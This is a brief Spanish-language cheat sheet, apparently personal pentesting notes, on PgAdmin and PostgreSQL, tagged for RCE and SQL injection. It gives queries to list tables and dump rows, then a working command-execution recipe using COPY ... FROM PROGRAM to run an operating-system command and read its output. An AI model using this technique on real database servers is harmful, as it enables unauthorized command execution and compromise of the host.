PgAdmin
#postgresql #pgadmin #rce #sqli
Para ejecutar comandos sobre una db

- Listar las tablas de la db actual
sql
SELECT table_schema, table_name
FROM information_schema.tables
WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
ORDER BY table_schema, table_name;- Listar contenido
sql
SELECT * FROM user LIMIT 50;- RCE con output por consola
sql
DROP TABLE IF EXISTS rce_out;
CREATE TABLE rce_out (resultado text);
COPY rce_out FROM PROGRAM 'id';
SELECT * FROM rce_out;